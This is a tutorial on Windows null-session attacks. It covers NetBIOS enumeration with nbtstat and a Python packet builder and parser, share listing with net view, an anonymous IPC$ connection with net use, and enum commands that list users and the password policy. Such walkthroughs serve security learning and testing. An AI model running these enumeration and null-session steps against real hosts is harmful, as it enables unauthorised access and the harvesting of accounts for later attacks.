Exploiting Null Sessions with Windows
The most common command to use when enumerating Windows shares is nbtstat. Nbtstat is a Windows command that displays NetBIOS over TCP/IP information about a target, including the NetBIOS name table it has registered.

nbtstat -A <target IP>

The -A switch queries the remote host by IP address (lowercase -a takes a NetBIOS name instead) and prints the names and services it has registered, plus its MAC address.
Let's look at the output after executing this command against our target.

Here we can already see some interesting information, such as the MAC address, which can be used for later attacks (for example, to identify the hardware vendor or to track the host across address changes).
Let's break this table up a bit.

The first line in the table tells us information about the computer. WORKSTATION is the name of the computer and the suffix <00> tells us it is the Workstation Service registration. UNIQUE means that this name must map to only one IP address.

The next line tells us what domain the computer is in: it is part of the OFFICE domain. GROUP just means that the name may be registered by several hosts with different IP addresses.

There are many different suffixes, but the most intriguing one to us at the moment is <20>. A UNIQUE name with the <20> suffix signifies that the File Server Service is registered, which means the Server service is running and the host is able to serve shares. It does not by itself prove that any share is accessible without credentials; that is what the following steps check.
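To make the name table less of a black box, here is an added example (my own code, not from the original post) that builds the same NetBIOS Node Status Request that nbtstat -A sends to UDP/137, parses the response into the name, suffix, UNIQUE/GROUP and MAC fields shown above, and flags a registered File Server Service. The reply it parses is constructed in the script to mirror the page's table (WORKSTATION, OFFICE, a <20> entry); the MAC address, transaction ID and the query_node_status helper for live use are assumptions for illustration.

```python
import socket
import struct

NBSTAT_TYPE = 0x0021            # NBSTAT record type (RFC 1002)
CLASS_IN = 0x0001
WILDCARD = b"*" + b"\x00" * 15  # '*' padded with NULs: "send me all your names"

# Well-known NetBIOS suffixes, the <xx> values nbtstat prints.
SUFFIXES = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}

# Name flag bits (RFC 1002 4.2.18): G = group name, ACT = name is active.
FLAG_GROUP = 0x8000
FLAG_ACTIVE = 0x0400


def encode_name(raw16: bytes) -> bytes:
    """First-level encoding: every byte of the 16-byte NetBIOS name becomes two
    letters 'A'..'P' (one per nibble), wrapped as one 32-byte label."""
    assert len(raw16) == 16
    label = bytearray()
    for b in raw16:
        label.append(ord("A") + (b >> 4))
        label.append(ord("A") + (b & 0x0F))
    return bytes([32]) + bytes(label) + b"\x00"


def build_node_status_request(txid: int) -> bytes:
    """The datagram 'nbtstat -A <ip>' sends: header with QDCOUNT=1, then the
    wildcard name question of type NBSTAT, class IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_name(WILDCARD) + struct.pack(">HH", NBSTAT_TYPE, CLASS_IN)
    return header + question


def build_node_status_response(txid: int, names, mac: bytes) -> bytes:
    """The reply a NetBIOS node sends back; names = [(name, suffix, flags), ...].
    Used here only to construct sample input (a real target builds this itself)."""
    rdata = bytes([len(names)])
    for name, suffix, flags in names:
        rdata += name.ljust(15).encode("ascii") + bytes([suffix]) + struct.pack(">H", flags)
    rdata += mac + b"\x00" * 40      # UNIT_ID (the MAC) then 40 bytes of statistics
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)  # response bit, ANCOUNT=1
    rr = encode_name(WILDCARD) + struct.pack(">HHIH", NBSTAT_TYPE, CLASS_IN, 0, len(rdata))
    return header + rr + rdata


def parse_node_status_response(data: bytes) -> dict:
    """Extract the name table and UNIT_ID (MAC) from a node status response."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a node status response")
    off = 12
    while data[off] != 0:            # skip the answer's encoded name labels
        off += 1 + data[off]
    off += 1
    rtype, _rclass, _ttl, rdlen = struct.unpack_from(">HHIH", data, off)
    off += 10
    if rtype != NBSTAT_TYPE:
        raise ValueError("unexpected record type 0x%04x" % rtype)
    rdata = data[off:off + rdlen]
    entries, pos = [], 1
    for _ in range(rdata[0]):
        nflags = struct.unpack_from(">H", rdata, pos + 16)[0]
        entries.append({
            "name": rdata[pos:pos + 15].decode("ascii", "replace").rstrip(),
            "suffix": rdata[pos + 15],
            "type": "GROUP" if nflags & FLAG_GROUP else "UNIQUE",
            "active": bool(nflags & FLAG_ACTIVE),
            "service": SUFFIXES.get(rdata[pos + 15], "unknown"),
        })
        pos += 18
    mac = rdata[pos:pos + 6]
    return {"txid": txid, "names": entries, "mac": "-".join("%02X" % b for b in mac)}


def file_server_registered(parsed: dict) -> bool:
    """True when a UNIQUE, active <20> name exists: the Server service is up and
    can serve shares. Not proof that any share is reachable anonymously."""
    return any(e["suffix"] == 0x20 and e["type"] == "UNIQUE" and e["active"]
               for e in parsed["names"])


def query_node_status(ip: str, timeout: float = 2.0) -> dict:
    """Live equivalent of 'nbtstat -A ip' (assumed helper; needs a reachable host)."""
    txid = 0x1234
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_node_status_request(txid), (ip, 137))
        data, _ = sock.recvfrom(4096)
    finally:
        sock.close()
    parsed = parse_node_status_response(data)
    if parsed["txid"] != txid:
        raise ValueError("transaction id mismatch")
    return parsed


# Constructed sample reply mirroring the page's table; not captured from a real host.
SAMPLE_NAMES = [
    ("WORKSTATION", 0x00, FLAG_ACTIVE),               # UNIQUE: Workstation Service
    ("OFFICE",      0x00, FLAG_GROUP | FLAG_ACTIVE),  # GROUP: the domain
    ("WORKSTATION", 0x20, FLAG_ACTIVE),               # UNIQUE: File Server Service
    ("OFFICE",      0x1E, FLAG_GROUP | FLAG_ACTIVE),  # GROUP: browser elections
]
SAMPLE_RESPONSE = build_node_status_response(0x1234, SAMPLE_NAMES, bytes.fromhex("001122aabbcc"))

if __name__ == "__main__":
    info = parse_node_status_response(SAMPLE_RESPONSE)
    for e in info["names"]:
        print("%-15s <%02X>  %-6s  %s" % (e["name"], e["suffix"], e["type"], e["service"]))
    print("MAC Address =", info["mac"])
    print("File Server Service registered:", file_server_registered(info))
```

Running it as a script prints a table in the same shape as nbtstat's; replace the constructed sample with query_node_status("192.168.1.8") to query a live host on a network you are authorised to test.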
Now that we know the target has the File Server Service registered, we can try to find out what shares it is hosting. To do this, we execute the following command (the target is given as a UNC host name, so the IP is preceded by two backslashes):

net view \\<target IP>
Let's see what we get when we perform this against our current target.

As we can see, this target has quite a few shared resources. It is sharing its Aaron:\ drive, ShareDocs, and Printer.
Next we try to connect to an administrative share without any login credentials:

net use \\192.168.1.8\IPC$ "" /u:""

If you see the message "The command completed successfully.", the command prompt is telling us that the connection was established.

But what did we do exactly? We connected to the Inter-Process Communication (IPC$) administrative share on 192.168.1.8 (our target) without specifying a user or password, taking advantage of a null session. This only works with IPC$. Note that current Windows versions restrict anonymous access to IPC$ by default (the RestrictAnonymous and RestrictNullSessAccess settings), so expect this to succeed mainly on older or deliberately weakened hosts.
If instead you see the message "System error 5 has occurred. Access is denied.", the share you asked for refused the anonymous connection. Here that is what happens when we run the same command against the C$ default administrative share: it returns Access is denied because the null session only works with the IPC$ share, and every other administrative share requires real credentials.
Now that we've shown that we can exploit a null session, what do we do? Well, we can do many different things using a tool called Enum. The same information can be pulled out with the net command, but this tool automates many of the tasks.

enum -S 192.168.1.8
enum -U 192.168.1.8
enum -P 192.168.1.8

Flags:

-S : tells enum to list the shares.
-U : tells enum to list the users.
-P : tells enum to retrieve the password policy set by the administrator.

More flags are described in the tool's manual.